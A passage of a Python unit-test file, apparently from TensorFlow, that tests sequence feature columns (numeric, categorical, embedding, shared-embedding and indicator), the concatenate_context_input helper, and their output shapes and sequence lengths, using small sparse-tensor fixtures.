# Input a with sequence_length = [2, 1]
sparse_input_a = sparse_tensor.SparseTensorValue(
indices=((0, 0), (0, 1), (1, 0)),
values=(0., 1., 10.),
dense_shape=(2, 2))
# Input b with sequence_length = [1, 1]
sparse_input_b = sparse_tensor.SparseTensorValue(
indices=((0, 0), (1, 0)),
values=(1., 10.),
dense_shape=(2, 2))
numeric_column_a = sfc.sequence_numeric_column('aaa')
numeric_column_b = sfc.sequence_numeric_column('bbb')
sequence_input_layer = sfc.SequenceFeatures(
[numeric_column_a, numeric_column_b])
_, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b})
with monitored_session.MonitoredSession() as sess:
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
r'\[Condition x == y did not hold element-wise:\] '
r'\[x \(sequence_features/aaa/sequence_length:0\) = \] \[2 1\] '
r'\[y \(sequence_features/bbb/sequence_length:0\) = \] \[1 1\]'):
sess.run(sequence_length)
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [[[0., 1.], [2., 3.]], [[4., 5.], [6., 7.]]]
# example 1, [[[10., 11.], [12., 13.]]]
'indices': ((0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6),
(0, 7), (1, 0), (1, 1), (1, 2), (1, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 8)},
'expected_shape': [2, 2, 4]},
{'testcase_name': '3D',
'sparse_input_args': {
# example 0, values [[0., 1., 2., 3.]], [[4., 5., 6., 7.]]
# example 1, [[10., 11., 12., 13.], []]
'indices': ((0, 0, 0), (0, 0, 1), (0, 0, 2), (0, 0, 3),
(0, 1, 0), (0, 1, 1), (0, 1, 2), (0, 1, 2),
(1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 0, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 2, 4)},
'expected_shape': [2, 2, 4]},
)
def test_static_shape_from_tensors_numeric(
self, sparse_input_args, expected_shape):
"""Tests that we return a known static shape when we have one."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=(2, 2))
sequence_input_layer = sfc.SequenceFeatures([numeric_column])
input_layer, _ = sequence_input_layer({'aaa': sparse_input})
shape = input_layer.get_shape()
self.assertEqual(shape, expected_shape)
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
'indices': ((0, 0), (1, 0), (1, 1), (3, 0)),
'values': (2, 0, 1, 1),
'dense_shape': (4, 2)},
'expected_shape': [4, 2, 3]},
{'testcase_name': '3D',
'sparse_input_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
# example 2, ids []
# example 3, ids [[1], [0, 2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 1, 0), (3, 1, 1)),
'values': (2, 0, 1, 2, 1, 0, 2),
'dense_shape': (4, 2, 2)},
'expected_shape': [4, 2, 3]}
)
def test_static_shape_from_tensors_indicator(
self, sparse_input_args, expected_shape):
"""Tests that we return a known static shape when we have one."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=3)
indicator_column = fc.indicator_column(categorical_column)
sequence_input_layer = sfc.SequenceFeatures([indicator_column])
input_layer, _ = sequence_input_layer({'aaa': sparse_input})
shape = input_layer.get_shape()
self.assertEqual(shape, expected_shape)
def test_compute_output_shape(self):
price1 = sfc.sequence_numeric_column('price1', shape=2)
price2 = sfc.sequence_numeric_column('price2')
with ops.Graph().as_default():
features = {
'price1': sparse_tensor.SparseTensor(
indices=[[0, 0, 0], [0, 0, 1],
[0, 1, 0], [0, 1, 1],
[1, 0, 0], [1, 0, 1],
[2, 0, 0], [2, 0, 1],
[3, 0, 0], [3, 0, 1]],
values=[0., 1., 10., 11., 100., 101., 200., 201., 300., 301.],
dense_shape=(4, 3, 2)),
'price2': sparse_tensor.SparseTensor(
indices=[[0, 0],
[0, 1],
[1, 0],
[2, 0],
[3, 0]],
values=[10., 11., 20., 30., 40.],
dense_shape=(4, 3))}
sequence_features = sfc.SequenceFeatures([price1, price2])
seq_input, seq_len = sequence_features(features)
self.assertEqual(
sequence_features.compute_output_shape((None, None)),
(None, None, 3))
self.evaluate(variables_lib.global_variables_initializer())
self.evaluate(lookup_ops.tables_initializer())
self.assertAllClose([[[0., 1., 10.], [10., 11., 11.], [0., 0., 0.]],
[[100., 101., 20.], [0., 0., 0.], [0., 0., 0.]],
[[200., 201., 30.], [0., 0., 0.], [0., 0., 0.]],
[[300., 301., 40.], [0., 0., 0.], [0., 0., 0.]]],
self.evaluate(seq_input))
self.assertAllClose([2, 1, 1, 1], self.evaluate(seq_len))
class ConcatenateContextInputTest(test.TestCase, parameterized.TestCase):
"""Tests the utility fn concatenate_context_input."""
def test_concatenate_context_input(self):
seq_input = ops.convert_to_tensor(np.arange(12).reshape(2, 3, 2))
context_input = ops.convert_to_tensor(np.arange(10).reshape(2, 5))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
input_layer = sfc.concatenate_context_input(context_input, seq_input)
expected = np.array([
[[0, 1, 0, 1, 2, 3, 4], [2, 3, 0, 1, 2, 3, 4], [4, 5, 0, 1, 2, 3, 4]],
[[6, 7, 5, 6, 7, 8, 9], [8, 9, 5, 6, 7, 8, 9], [10, 11, 5, 6, 7, 8, 9]]
], dtype=np.float32)
with monitored_session.MonitoredSession() as sess:
output = sess.run(input_layer)
self.assertAllEqual(expected, output)
@parameterized.named_parameters(
{'testcase_name': 'rank_lt_3',
'seq_input_arg': np.arange(100).reshape(10, 10)},
{'testcase_name': 'rank_gt_3',
'seq_input_arg': np.arange(100).reshape(5, 5, 2, 2)}
)
def test_sequence_input_throws_error(self, seq_input_arg):
seq_input = ops.convert_to_tensor(seq_input_arg)
context_input = ops.convert_to_tensor(np.arange(100).reshape(10, 10))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(ValueError, 'sequence_input must have rank 3'):
sfc.concatenate_context_input(context_input, seq_input)
@parameterized.named_parameters(
{'testcase_name': 'rank_lt_2',
'context_input_arg': np.arange(100)},
{'testcase_name': 'rank_gt_2',
'context_input_arg': np.arange(100).reshape(5, 5, 4)}
)
def test_context_input_throws_error(self, context_input_arg):
context_input = ops.convert_to_tensor(context_input_arg)
seq_input = ops.convert_to_tensor(np.arange(100).reshape(5, 5, 4))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(ValueError, 'context_input must have rank 2'):
sfc.concatenate_context_input(context_input, seq_input)
def test_integer_seq_input_throws_error(self):
seq_input = ops.convert_to_tensor(np.arange(100).reshape(5, 5, 4))
context_input = ops.convert_to_tensor(np.arange(100).reshape(10, 10))
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(
TypeError, 'sequence_input must have dtype float32'):
sfc.concatenate_context_input(context_input, seq_input)
def test_integer_context_input_throws_error(self):
seq_input = ops.convert_to_tensor(np.arange(100).reshape(5, 5, 4))
context_input = ops.convert_to_tensor(np.arange(100).reshape(10, 10))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(
TypeError, 'context_input must have dtype float32'):
sfc.concatenate_context_input(context_input, seq_input)
class DenseFeaturesTest(test.TestCase):
"""Tests DenseFeatures with sequence feature columns."""
def test_embedding_column(self):
"""Tests that error is raised for sequence embedding column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column_a = fc.embedding_column(
categorical_column_a, dimension=2)
with self.assertRaisesRegexp(
ValueError,
r'In embedding_column: aaa_embedding\. categorical_column must not be '
r'of type SequenceCategoricalColumn\.'):
input_layer = fc.DenseFeatures([embedding_column_a])
_ = input_layer({'aaa': sparse_input})
def test_indicator_column(self):
"""Tests that error is raised for sequence indicator column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column_a = fc.indicator_column(categorical_column_a)
with self.assertRaisesRegexp(
ValueError,
r'In indicator_column: aaa_indicator\. categorical_column must not be '
r'of type SequenceCategoricalColumn\.'):
input_layer = fc.DenseFeatures([indicator_column_a])
_ = input_layer({'aaa': sparse_input})
def _assert_sparse_tensor_value(test_case, expected, actual):
_assert_sparse_tensor_indices_shape(test_case, expected, actual)
test_case.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case.assertAllEqual(expected.values, actual.values)
def _assert_sparse_tensor_indices_shape(test_case, expected, actual):
test_case.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case.assertAllEqual(expected.indices, actual.indices)
test_case.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case.assertAllEqual(expected.dense_shape, actual.dense_shape)
def _get_sequence_dense_tensor(column, features):
return column.get_sequence_dense_tensor(
fc.FeatureTransformationCache(features), None)
def _get_sequence_dense_tensor_state(column, features):
state_manager = _TestStateManager()
column.create_state(state_manager)
return column.get_sequence_dense_tensor(
fc.FeatureTransformationCache(features), state_manager)
def _get_sparse_tensors(column, features):
return column.get_sparse_tensors(
fc.FeatureTransformationCache(features), None)
class SequenceCategoricalColumnWithIdentityTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (1, 2, 0),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
'values': np.array((1, 2, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': (6, 7, 8),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': (6, 7, 8),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_identity('aaa', num_buckets=9)
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_value(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
class SequenceCategoricalColumnWithHashBucketTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': ('omar', 'stringer', 'marlo'),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
# Ignored to avoid hash dependence in test.
'values': np.array((0, 0, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': ('omar', 'stringer', 'marlo'),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
# Ignored to avoid hash dependence in test.
'values': np.array((0, 0, 0), dtype=np.int64),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_hash_bucket(
'aaa', hash_bucket_size=10)
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_indices_shape(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
class SequenceCategoricalColumnWithVocabularyFileTest(
test.TestCase, parameterized.TestCase):
def _write_vocab(self, vocab_strings, file_name):
vocab_file = os.path.join(self.get_temp_dir(), file_name)
with open(vocab_file, 'w') as f:
f.write('\n'.join(vocab_strings))
return vocab_file
def setUp(self):
super(SequenceCategoricalColumnWithVocabularyFileTest, self).setUp()
vocab_strings = ['omar', 'stringer', 'marlo']
self._wire_vocabulary_file_name = self._write_vocab(vocab_strings,
'wire_vocabulary.txt')
self._wire_vocabulary_size = 3
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': ('marlo', 'skywalker', 'omar'),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
'values': np.array((2, -1, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': ('omar', 'skywalker', 'marlo'),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': np.array((0, -1, 2), dtype=np.int64),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_vocabulary_file(
key='aaa',
vocabulary_file=self._wire_vocabulary_file_name,
vocabulary_size=self._wire_vocabulary_size)
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_value(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
def test_get_sparse_tensors_dynamic_zero_length(self):
"""Tests _get_sparse_tensors with a dynamic sequence length."""
inputs = sparse_tensor.SparseTensorValue(
indices=np.zeros((0, 2)), values=[], dense_shape=(2, 0))
expected = sparse_tensor.SparseTensorValue(
indices=np.zeros((0, 3)),
values=np.array((), dtype=np.int64),
dense_shape=(2, 0, 1))
column = sfc.sequence_categorical_column_with_vocabulary_file(
key='aaa',
vocabulary_file=self._wire_vocabulary_file_name,
vocabulary_size=self._wire_vocabulary_size)
input_placeholder_shape = list(inputs.dense_shape)
# Make second dimension (sequence length) dynamic.
input_placeholder_shape[1] = None
input_placeholder = array_ops.sparse_placeholder(
dtypes.string, shape=input_placeholder_shape)
id_weight_pair = _get_sparse_tensors(column, {'aaa': input_placeholder})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
result = id_weight_pair.id_tensor.eval(
session=sess, feed_dict={input_placeholder: inputs})
_assert_sparse_tensor_value(
self, expected, result)
class SequenceCategoricalColumnWithVocabularyListTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': ('marlo', 'skywalker', 'omar'),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
'values': np.array((2, -1, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': ('omar', 'skywalker', 'marlo'),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': np.array((0, -1, 2), dtype=np.int64),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_vocabulary_list(
key='aaa',
vocabulary_list=('omar', 'stringer', 'marlo'))
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_value(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
class SequenceEmbeddingColumnTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
'indices': ((0, 0), (1, 0), (1, 1), (3, 0)),
'values': (2, 0, 1, 1),
'dense_shape': (4, 2)},
'expected': [
# example 0, ids [2]
[[7., 11.], [0., 0.]],
# example 1, ids [0, 1]
[[1., 2.], [3., 5.]],
# example 2, ids []
[[0., 0.], [0., 0.]],
# example 3, ids [1]
[[3., 5.], [0., 0.]]]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
# example 2, ids []
# example 3, ids [[1], [0, 2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 1, 0), (3, 1, 1)),
'values': (2, 0, 1, 2, 1, 0, 2),
'dense_shape': (4, 2, 2)},
'expected': [
# example 0, ids [[2]]
[[7., 11.], [0., 0.]],
# example 1, ids [[0, 1], [2]]
[[2, 3.5], [7., 11.]],
# example 2, ids []
[[0., 0.], [0., 0.]],
# example 3, ids [[1], [0, 2]]
[[3., 5.], [4., 6.5]]]}
)
def test_get_sequence_dense_tensor(self, inputs_args, expected):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 5.), # id 1
(7., 11.) # id 2
)
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column = fc.embedding_column(
categorical_column, dimension=embedding_dimension,
initializer=_initializer)
embedding_lookup, _ = _get_sequence_dense_tensor_state(
embedding_column, {'aaa': inputs})
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertCountEqual(
('embedding_weights:0',), tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values, global_vars[0].eval(session=sess))
self.assertAllEqual(expected, embedding_lookup.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 2),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2]}
)
def test_sequence_length(self, inputs_args, expected_sequence_length):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column = fc.embedding_column(
categorical_column, dimension=2)
_, sequence_length = _get_sequence_dense_tensor_state(
embedding_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
sequence_length = sess.run(sequence_length)
self.assertAllEqual(expected_sequence_length, sequence_length)
self.assertEqual(np.int64, sequence_length.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids []
# example 1, ids [2]
# example 2, ids [0, 1]
# example 3, ids []
# example 4, ids [1]
# example 5, ids []
indices=((1, 0), (2, 0), (2, 1), (4, 0)),
values=(2, 0, 1, 1),
dense_shape=(6, 2))
expected_sequence_length = [0, 1, 2, 0, 1, 0]
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column = fc.embedding_column(
categorical_column, dimension=2)
_, sequence_length = _get_sequence_dense_tensor_state(
embedding_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
class SequenceSharedEmbeddingColumnTest(test.TestCase):
def test_get_sequence_dense_tensor(self):
vocabulary_size = 3
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 5.), # id 1
(7., 11.) # id 2
)
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
indices=((0, 0), (1, 0), (1, 1), (3, 0)),
values=(2, 0, 1, 1),
dense_shape=(4, 2))
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [1]
# example 1, ids [0, 2]
# example 2, ids [0]
# example 3, ids []
indices=((0, 0), (1, 0), (1, 1), (2, 0)),
values=(1, 0, 2, 0),
dense_shape=(4, 2))
expected_lookups_a = [
# example 0, ids [2]
[[7., 11.], [0., 0.]],
# example 1, ids [0, 1]
[[1., 2.], [3., 5.]],
# example 2, ids []
[[0., 0.], [0., 0.]],
# example 3, ids [1]
[[3., 5.], [0., 0.]],
]
expected_lookups_b = [
# example 0, ids [1]
[[3., 5.], [0., 0.]],
# example 1, ids [0, 2]
[[1., 2.], [7., 11.]],
# example 2, ids [0]
[[1., 2.], [0., 0.]],
# example 3, ids []
[[0., 0.], [0., 0.]],
]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b],
dimension=embedding_dimension,
initializer=_initializer)
embedding_lookup_a = _get_sequence_dense_tensor(
shared_embedding_columns[0], {'aaa': sparse_input_a})[0]
embedding_lookup_b = _get_sequence_dense_tensor(
shared_embedding_columns[1], {'bbb': sparse_input_b})[0]
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertItemsEqual(('aaa_bbb_shared_embedding:0',),
tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values, global_vars[0].eval(session=sess))
self.assertAllEqual(
expected_lookups_a, embedding_lookup_a.eval(session=sess))
self.assertAllEqual(
expected_lookups_b, embedding_lookup_b.eval(session=sess))
def test_sequence_length(self):
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
expected_sequence_length_a = [1, 2]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [0, 2]
# example 1, ids [1]
indices=((0, 0), (0, 1), (1, 0)),
values=(0, 2, 1),
dense_shape=(2, 2))
expected_sequence_length_b = [2, 1]
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b], dimension=2)
sequence_length_a = _get_sequence_dense_tensor(
shared_embedding_columns[0], {'aaa': sparse_input_a})[1]
sequence_length_b = _get_sequence_dense_tensor(
shared_embedding_columns[1], {'bbb': sparse_input_b})[1]
with monitored_session.MonitoredSession() as sess:
sequence_length_a = sess.run(sequence_length_a)
self.assertAllEqual(expected_sequence_length_a, sequence_length_a)
self.assertEqual(np.int64, sequence_length_a.dtype)
sequence_length_b = sess.run(sequence_length_b)
self.assertAllEqual(expected_sequence_length_b, sequence_length_b)
self.assertEqual(np.int64, sequence_length_b.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids []
# example 1, ids [2]
# example 2, ids [0, 1]
# example 3, ids []
# example 4, ids [1]
# example 5, ids []
indices=((1, 0), (2, 0), (2, 1), (4, 0)),
values=(2, 0, 1, 1),
dense_shape=(6, 2))
expected_sequence_length_a = [0, 1, 2, 0, 1, 0]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids []
# example 2, ids []
# example 3, ids []
# example 4, ids [1]
# example 5, ids [0, 1]
indices=((0, 0), (4, 0), (5, 0), (5, 1)),
values=(2, 1, 0, 1),
dense_shape=(6, 2))
expected_sequence_length_b = [1, 0, 0, 0, 1, 2]
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b], dimension=2)
sequence_length_a = _get_sequence_dense_tensor(
shared_embedding_columns[0], {'aaa': sparse_input_a})[1]
sequence_length_b = _get_sequence_dense_tensor(
shared_embedding_columns[1], {'bbb': sparse_input_b})[1]
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length_a, sequence_length_a.eval(session=sess))
self.assertAllEqual(
expected_sequence_length_b, sequence_length_b.eval(session=sess))
class SequenceIndicatorColumnTest(test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
'indices': ((0, 0), (1, 0), (1, 1), (3, 0)),
'values': (2, 0, 1, 1),
'dense_shape': (4, 2)},
'expected': [
# example 0, ids [2]
[[0., 0., 1.], [0., 0., 0.]],
# example 1, ids [0, 1]
[[1., 0., 0.], [0., 1., 0.]],
# example 2, ids []
[[0., 0., 0.], [0., 0., 0.]],
# example 3, ids [1]
[[0., 1., 0.], [0., 0., 0.]]]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
# example 2, ids []
# example 3, ids [[1], [2, 2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 1, 0), (3, 1, 1)),
'values': (2, 0, 1, 2, 1, 2, 2),
'dense_shape': (4, 2, 2)},
'expected': [
# example 0, ids [[2]]
[[0., 0., 1.], [0., 0., 0.]],
# example 1, ids [[0, 1], [2]]
[[1., 1., 0.], [0., 0., 1.]],
# example 2, ids []
[[0., 0., 0.], [0., 0., 0.]],
# example 3, ids [[1], [2, 2]]
[[0., 1., 0.], [0., 0., 2.]]]}
)
def test_get_sequence_dense_tensor(self, inputs_args, expected):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column = fc.indicator_column(categorical_column)
indicator_tensor, _ = _get_sequence_dense_tensor(
indicator_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected, indicator_tensor.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 2),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2]}
)
def test_sequence_length(self, inputs_args, expected_sequence_length):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column = fc.indicator_column(categorical_column)
_, sequence_length = _get_sequence_dense_tensor(
indicator_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
sequence_length = sess.run(sequence_length)
self.assertAllEqual(expected_sequence_length, sequence_length)
self.assertEqual(np.int64, sequence_length.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids []
# example 1, ids [2]
# example 2, ids [0, 1]
# example 3, ids []
# example 4, ids [1]
# example 5, ids []
indices=((1, 0), (2, 0), (2, 1), (4, 0)),
values=(2, 0, 1, 1),
dense_shape=(6, 2))
expected_sequence_length = [0, 1, 2, 0, 1, 0]
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column = fc.indicator_column(categorical_column)
